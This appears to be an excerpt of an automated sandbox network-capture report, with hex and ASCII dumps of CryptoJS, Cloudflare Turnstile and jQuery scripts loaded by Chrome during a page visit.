                                                                2025-01-10 21:29:01 UTC1369INData Raw: 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53
                                                                Data Ascii: At(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRS
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f
                                                                Data Ascii: in(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30
                                                                Data Ascii: =C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.849727104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:02 UTC646OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://a89.softevol.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:02 UTC471INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:02 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 47521
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc29e1924c32c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:02 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                2025-01-10 21:29:02 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.849729151.101.130.1374431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:02 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:02 UTC613INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 2029068
                                                                Date: Fri, 10 Jan 2025 21:29:02 GMT
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740044-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 2774, 0
                                                                X-Timer: S1736544543.512902,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2025-01-10 21:29:02 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
